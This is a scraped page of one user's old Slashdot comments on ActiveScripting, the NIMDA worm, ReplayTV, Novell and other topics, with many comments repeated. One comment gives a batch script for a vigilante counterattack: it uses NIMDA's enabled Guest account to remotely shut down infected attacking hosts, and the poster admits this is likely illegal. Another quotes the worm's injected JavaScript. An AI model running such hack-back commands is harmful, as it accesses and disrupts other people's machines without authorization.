Will you explain to me why ActiveScripting (the API) is inherently itself insecure?
My experience has been that most of the script-related security problems on Windows are not the scripting language itself, nor the API that binds it to the browser. They were caused by poorly written COM objects which were then accessed via scripts. Even NIMDA, though it uses JavaScript to launch off a web page, is actually exploiting a hole in IE/Outlook express.
I worked for Internet Security Systems for four years, and wrote alot of the guts of their Intrusion Detection System, so I think I have a decent familiarity with the security issues here.
But maybe I missed something, feel free to explain what...
I'm not trolling. It's a legitimate answer to the guys question. Like or not, the vast majority of people who browse most web pages are using Windows. So if you want to build scriptable web pages to target those users, you are going to have to target Windows.
If someone is interested in adding pluggable scripting functionality to other platforms, it would certainly benefit the runtime authors if they could use similar integration API's on each platform. ActiveScripting or AppleScripting (mentioned elsewhere in this thread) could be ported to *nix to become that API, and new languages could become cross platform more easily.
I'm platform agnostic. I'm also pragmatic, and I'd rather use something that already exists than have to re-invent the wheel.
Caveat reador: I work for this company, and on this product, so I am not unbiased.
WhatsUp Gold by Ipswitch is a network monitoring product that builds nice maps of your network by auto-discovering your systems. It has nice scalable (vector graphic) icons for common system types and lets you create your own.
The new version which is due out later this year has a very flexible import/export system for maps so that you could easily use WUG to generate the maps then export them (in XML, for instance) to another program for tweaking.
It's main use is to monitor your systems and page/email/phone/etc you when things go down.
This already exists on Windows, it's called ActiveScripting. Basically, the API's that both VBScript and JScript (JavaScript) use to integrate themselves into the browser are exposed to others as well. If you follow the API guidelines, then you can use any scripting language from any hosting program including IE.
Of course, the problem is that a web site owner can't assume that an end user has a given language runtime installed. So that limits how you can use it. But it could have great applications on intranets where you have more control over the client situation.
ActiveState has versions of Perl, Python and TCL that follow these API's on Windows. Here is a session they were going to do at the cancelled O'Reilly P2P conference on using this stuff
Here's a better way. THIS WORKS. It takes advantage of the fact that NIMDA (1) enables the Guest account, (2) blanks its password and (3) puts Guest into the Administrators group.
Use whatever tool you use to detect incoming NIMDA attacks toward your servers. A simple way is to just put a dummy port 80 listener on a box that nobody has any reason to connect to, and assume all incoming port 80 connects are from worms or other attackers.
Whenever you get an attack, launch the following script:
net use \\%1/user:guest
psshutdown -t 5 -m "This system is infected with NIMDA! Shutting down..." -f \\%1
net use \\%1/d
%1 in the above should be the attacking IP.
This uses PSSHUTDOWN.EXE which you can download from System Internals. It could easily be adapted to use SHUTDOWN.EXE from the resource kit.
Yes, I realize this is probably illegal in most jurisdictions. Save your flames.
I posted earlier in the thread: If you have Javascript disabled in your browser, the EML execution will not happen. It does it via a window.open command.
But everyone here has Javascript disabled for unknown web sites, right?
If you have Javascript disabled by default in your browser, these infected web pages are not a problem.
Here's the script it adds to the bottom of the page. It does it OUTSIDE the <HTML %gt; </HTML %gt; wrappers to the page, so its really obvious it was just tacked onto the end...
I'm also not sure if it has wishlists, and I know it doesn't have suggestions.
Yes, Replay has wishlists. In fact, it had them before Tivo did. That was one of the main reasons I got Replay instead of Tivo two years ago.
About prioritizing: I find with the Replay the best way to go is to use what they call "non guaranteed" programs for nearly everything. That lets the Replay manage the disk space just like Tivo does. You only set "guaranteed" for those programs that you ABSOLUTELY gotta record, like a live broadcast that will never be repeated. If you follow that, you rarely have to deal with conflicts, though occasionally it might not record exactly what you thought it would.
I know this is offtopic (so flame away) and this is an old bugaboo, but its annoying to me. I submitted this same item, with the link to the original story on The NY Times as well as four or five other useful links (including to the actual patent) on Friday afternoon, and it was rejected:
2001-08-17 15:37:07 Stem Cells are Patented (articles,news) (rejected)
Do the Slashdot editors ever talk to each other or coordinate what they are doing in any way? I try to submit stories regularly, but they always get rejected. I don't know why I bother.
Lots of folks have mentioned other brands of players that play CD's containing MP3's. Here's a quick plug for a really nice one by TDK called the MOJO.
It plays normal CD's, CD-R's and CD-RW's. It has up to 8 minutes of shock protection for MP3's (it actually spins down the disk). It uses normal AA batteries. It can play MP3's no matter how you organize them on the disk, not limited to root directory. And best of all it has a really nice UI on its LCD screen. Don't take my word for it, read another review here.
The mention of how Microsoft is piggy backing on the BSA's efforts to make sales in the target cities, reminded me of a great investigative article that Mother Jones magazine ran some three years ago.
In this 1998 report entitled "Overseas Invasion", they report how the BSA offices in other countries are often run solely by a Microsoft employee, and act as if they are just an arm of Microsoft marketing.
This included cases where companies were actually investigated and found to be non-compliant on a variety of products from different vendors, but BSA "wiped the slate clean" if the company bought a big site license for Microsoft Office! Quite insidious.
I think I can predict some tactics that Macrovision may use to prevent people from bypassing this scheme.
Of course, they can go the DMCA route, that would be a natural. But there's another route.
It turns out Macrovision has been patenting not only the techniques that they use, but techniques for defeating them! By patenting ways around their copy protection before its even released, they can legally prevent circumvention devices through civil patent infringement lawsuits.
Here are some of their patents on circumvention of their earlier video stuff:
>> I'm basically thinking that they shoot
>> each "sequence with an anchor" twice, once
>> saying "ScrapHeads", once saying "JunkYard
>> Wars".
Well, it's "Scrapheap" for one thing.
And if you watch the Robert Llewellyn shows very carefully, you will notice that he NEVER actually says "Junkyard Wars". And, in fact, occasionally you can catch him saying "Scrapheap". (Trust me, I have every single episode on tape).
You also occasionally can *see* the British name of the show, for instance in the one where they raised the car out of the lake, each car had "Scrapheap" painted on the side of it. (Also a banner with the show logo on the host truck in some of the remote challenges, and when trophies are awarded).
That's why they add those endlessly repetitive bumpers at the commercial breaks to remind you of the American name of the show, because the host doesn't say it.
Of course, this just applies to the ones that have aired so far. For the upcoming shows, they may well do something like you are talking about. I doubt it though, because it appears now they film separate American and British series, with separate hosts. Too bad, I really liked Llewellyn's style.
At least George Gray is out for the next series! I found him very annoying
If this restored the live-action TV, then you're still not regaining the lost freeze-frame feature. If this turns off the ad and returns you to the current program, frozen on the screen, then it's a little more acceptable.
It turns off the ad and puts the frozen frame back on the screen.
Although the question raised by this article is still valid, the basic facts that provoked it are already obsolete. ReplayTV has already disabled this feature.
In fact, they did so months ago!
I'm a very happy long-time Replay owner (since October of 1999) and I agree with the author that the product has significant advantages over Tivo. However, I think he's blown this all out of proportion.
First of all, when you are pausing the show you are watching, what difference does it make if they put an advertisement on the screen? Really, is it that much of an intrusion? Come on!
Second of all, even when this feature was still active (and its been disabled for months now) you could bypass the ads simply by pressing one more key after you hit Pause. (The Exit key).
Once again, this is much ado about nothing, in the case of the specific ReplayTV feature, anyway.
How about one entire generation of CPU's, the 80286? This was Intel's first attempt to add a "protected mode" to the x86 architecture, and judging from the support they got from the OS vendors, they pretty much botched it. Until the 386 came out, 286 systems were pretty much used as really fast 8086's and their extra capabilities were wasted.
They spun that part of the business off already
on
Is Novell Doomed?
·
· Score: 1
FYI: Caldera was built out of a division that Novell sold off in 1996. Novell also used to own UnixWare until it was sold to SCO, but then SCO sold a bunch of its business Caldera.
Caldera and Novell are based in the same city and already cooperate on a number of Novell-related Linux initiatives. So look to Caldera to do what you suggested.
Two fundamental errors in your analysis
on
Is Novell Doomed?
·
· Score: 1
> and even NDS is losing ground to
> LDAP based solutions.
That's a classic 'apples and oranges' statement. LDAP is a protocol to access a directory. NDS is an implementation of a directory. To say NDS is losing ground to LDAP is like saying "sendmail is losing ground to MAPI". Doesn't make any sense. NDS supports LDAP just as nicely as any other implementation, so if you need LDAP, then NDS is still a valid option for you.
> could make Netware largely irrelevant,
> especially now that most network
> printers are all direct-IP addressable
> and have little need for a print server
You don't work in a big office do you? I don't know too many printers that have gigabytes of RAM or disk space in them, and yet many office printers have many gigabytes of print jobs queued up to them constantly. Plus, allowing everyone in your organization unblocked access to the printer IP opens you up to all sorts of denial of service attacks on the printer.
No, print servers are not going away any time soon. Sorry.
I'm not sure I understand your argument vis-a-vis MS antitrust at all, but I can't offer anything that hasn't already been said here.
Slashdot Mirror
My experience has been that most of the script-related security problems on Windows are not the scripting language itself, nor the API that binds it to the browser. They were caused by poorly written COM objects which were then accessed via scripts. Even NIMDA, though it uses JavaScript to launch off a web page, is actually exploiting a hole in IE/Outlook express.
I worked for Internet Security Systems for four years, and wrote alot of the guts of their Intrusion Detection System, so I think I have a decent familiarity with the security issues here.
But maybe I missed something, feel free to explain what...
I'm not trolling. It's a legitimate answer to the guys question. Like or not, the vast majority of people who browse most web pages are using Windows. So if you want to build scriptable web pages to target those users, you are going to have to target Windows.
If someone is interested in adding pluggable scripting functionality to other platforms, it would certainly benefit the runtime authors if they could use similar integration API's on each platform. ActiveScripting or AppleScripting (mentioned elsewhere in this thread) could be ported to *nix to become that API, and new languages could become cross platform more easily.
I'm platform agnostic. I'm also pragmatic, and I'd rather use something that already exists than have to re-invent the wheel.
<BLATANT SELF PROMOTION>
Caveat reador: I work for this company, and on this product, so I am not unbiased.
WhatsUp Gold by Ipswitch is a network monitoring product that builds nice maps of your network by auto-discovering your systems. It has nice scalable (vector graphic) icons for common system types and lets you create your own.
The new version which is due out later this year has a very flexible import/export system for maps so that you could easily use WUG to generate the maps then export them (in XML, for instance) to another program for tweaking.
It's main use is to monitor your systems and page/email/phone/etc you when things go down.
</BLATANT SELF PROMOTION>
Of course, the problem is that a web site owner can't assume that an end user has a given language runtime installed. So that limits how you can use it. But it could have great applications on intranets where you have more control over the client situation.
ActiveState has versions of Perl, Python and TCL that follow these API's on Windows. Here is a session they were going to do at the cancelled O'Reilly P2P conference on using this stuff
Use whatever tool you use to detect incoming NIMDA attacks toward your servers. A simple way is to just put a dummy port 80 listener on a box that nobody has any reason to connect to, and assume all incoming port 80 connects are from worms or other attackers.
Whenever you get an attack, launch the following script:
net use \\%1 /user:guest
psshutdown -t 5 -m "This system is infected with NIMDA! Shutting down..." -f \\%1
net use \\%1 /d
%1 in the above should be the attacking IP.
This uses PSSHUTDOWN.EXE which you can download from System Internals. It could easily be adapted to use SHUTDOWN.EXE from the resource kit.
Yes, I realize this is probably illegal in most jurisdictions. Save your flames.
>> DO NOT TRY TO GO TO AN INFECTED IP ADDRESS
I posted earlier in the thread: If you have Javascript disabled in your browser, the EML execution will not happen. It does it via a window.open command.
But everyone here has Javascript disabled for unknown web sites, right?
Here's the script it adds to the bottom of the page. It does it OUTSIDE the <HTML %gt; </HTML %gt; wrappers to the page, so its really obvious it was just tacked onto the end...
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script> </html>
...would anyone really want to live or work right next to a 30 meter diameter turbine? I wouldn't.
Both were based on processes found in nature.
Both feature very simplistic mechanisms at their heart which aggregate to exhibit larger behaviors.
Both use random choices at the core to drive it all.
Both feature feedback loops that influence the progress of the evolution.
Yes, Replay has wishlists. In fact, it had them before Tivo did. That was one of the main reasons I got Replay instead of Tivo two years ago.
About prioritizing: I find with the Replay the best way to go is to use what they call "non guaranteed" programs for nearly everything. That lets the Replay manage the disk space just like Tivo does. You only set "guaranteed" for those programs that you ABSOLUTELY gotta record, like a live broadcast that will never be repeated. If you follow that, you rarely have to deal with conflicts, though occasionally it might not record exactly what you thought it would.
The latter seems supported by a wide variety of companies.
2001-08-17 15:37:07 Stem Cells are Patented (articles,news) (rejected)
Do the Slashdot editors ever talk to each other or coordinate what they are doing in any way? I try to submit stories regularly, but they always get rejected. I don't know why I bother.
It plays normal CD's, CD-R's and CD-RW's. It has up to 8 minutes of shock protection for MP3's (it actually spins down the disk). It uses normal AA batteries. It can play MP3's no matter how you organize them on the disk, not limited to root directory. And best of all it has a really nice UI on its LCD screen. Don't take my word for it, read another review here.
</UNSOLICITED PLUG>
Get with the program, almost all decent CD players have skip protection. Philips says this one has 100 seconds of skip protection on the specs page.
Human Task Switches Considered Harmful
He's got many good rants on that site.
In this 1998 report entitled "Overseas Invasion", they report how the BSA offices in other countries are often run solely by a Microsoft employee, and act as if they are just an arm of Microsoft marketing.
This included cases where companies were actually investigated and found to be non-compliant on a variety of products from different vendors, but BSA "wiped the slate clean" if the company bought a big site license for Microsoft Office! Quite insidious.
In the interest of full disclosure, I must point out that Microsoft and the BSA responded in a later issue of the magazine.
Of course, they can go the DMCA route, that would be a natural. But there's another route.
It turns out Macrovision has been patenting not only the techniques that they use, but techniques for defeating them! By patenting ways around their copy protection before its even released, they can legally prevent circumvention devices through civil patent infringement lawsuits.
Here are some of their patents on circumvention of their earlier video stuff:
>> each "sequence with an anchor" twice, once
>> saying "ScrapHeads", once saying "JunkYard
>> Wars".
Well, it's "Scrapheap" for one thing.
And if you watch the Robert Llewellyn shows very carefully, you will notice that he NEVER actually says "Junkyard Wars". And, in fact, occasionally you can catch him saying "Scrapheap". (Trust me, I have every single episode on tape).
You also occasionally can *see* the British name of the show, for instance in the one where they raised the car out of the lake, each car had "Scrapheap" painted on the side of it. (Also a banner with the show logo on the host truck in some of the remote challenges, and when trophies are awarded).
That's why they add those endlessly repetitive bumpers at the commercial breaks to remind you of the American name of the show, because the host doesn't say it.
Of course, this just applies to the ones that have aired so far. For the upcoming shows, they may well do something like you are talking about. I doubt it though, because it appears now they film separate American and British series, with separate hosts. Too bad, I really liked Llewellyn's style.
At least George Gray is out for the next series! I found him very annoying
Bell Labs did in fact patent the transistor. Read about it here.
Of course patents only lasted 17 years then, so that patent expired some 35 years ago, before the Japanese electronics industries really got going.
It turns off the ad and puts the frozen frame back on the screen.
Although the question raised by this article is still valid, the basic facts that provoked it are already obsolete. ReplayTV has already disabled this feature.
In fact, they did so months ago!
I'm a very happy long-time Replay owner (since October of 1999) and I agree with the author that the product has significant advantages over Tivo. However, I think he's blown this all out of proportion.
First of all, when you are pausing the show you are watching, what difference does it make if they put an advertisement on the screen? Really, is it that much of an intrusion? Come on!
Second of all, even when this feature was still active (and its been disabled for months now) you could bypass the ads simply by pressing one more key after you hit Pause. (The Exit key).
Once again, this is much ado about nothing, in the case of the specific ReplayTV feature, anyway.
No offense to our competitors at the company referenced, but ISS issued an advisory on this over a year ago. Read it here:
Form Tampering Vulnerabilities in Several Web-Based Shopping Cart Applications--Tim Farley, ISS
How about one entire generation of CPU's, the 80286? This was Intel's first attempt to add a "protected mode" to the x86 architecture, and judging from the support they got from the OS vendors, they pretty much botched it. Until the 386 came out, 286 systems were pretty much used as really fast 8086's and their extra capabilities were wasted.
FYI: Caldera was built out of a division that Novell sold off in 1996. Novell also used to own UnixWare until it was sold to SCO, but then SCO sold a bunch of its business Caldera.
Caldera and Novell are based in the same city and already cooperate on a number of Novell-related Linux initiatives. So look to Caldera to do what you suggested.
> LDAP based solutions.
That's a classic 'apples and oranges' statement. LDAP is a protocol to access a directory. NDS is an implementation of a directory. To say NDS is losing ground to LDAP is like saying "sendmail is losing ground to MAPI". Doesn't make any sense. NDS supports LDAP just as nicely as any other implementation, so if you need LDAP, then NDS is still a valid option for you.
> could make Netware largely irrelevant,
> especially now that most network
> printers are all direct-IP addressable
> and have little need for a print server
You don't work in a big office do you? I don't know too many printers that have gigabytes of RAM or disk space in them, and yet many office printers have many gigabytes of print jobs queued up to them constantly. Plus, allowing everyone in your organization unblocked access to the printer IP opens you up to all sorts of denial of service attacks on the printer.
No, print servers are not going away any time soon. Sorry.
I'm not sure I understand your argument vis-a-vis MS antitrust at all, but I can't offer anything that hasn't already been said here.